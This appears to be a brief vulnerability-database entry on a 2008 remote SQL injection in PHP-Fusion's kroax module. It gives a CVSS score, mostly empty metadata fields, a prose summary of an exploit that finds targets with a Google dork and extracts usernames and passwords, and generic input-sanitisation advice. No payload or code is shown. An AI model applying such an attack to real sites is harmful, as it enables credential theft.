vendor: N/A
by: boom3rang
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
The kroax php_fusion Remote SQL-injection
The kroax php_fusion remote SQL injection is a vulnerability that allows an attacker to inject malicious SQL commands into a vulnerable web application. An attacker can use it to gain access to sensitive information such as usernames and passwords. The exploit uses a Google dork to find vulnerable websites and then two SQL commands to obtain the username and password of the website: the first command retrieves the username and the second retrieves the password.
Mitigation:
The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.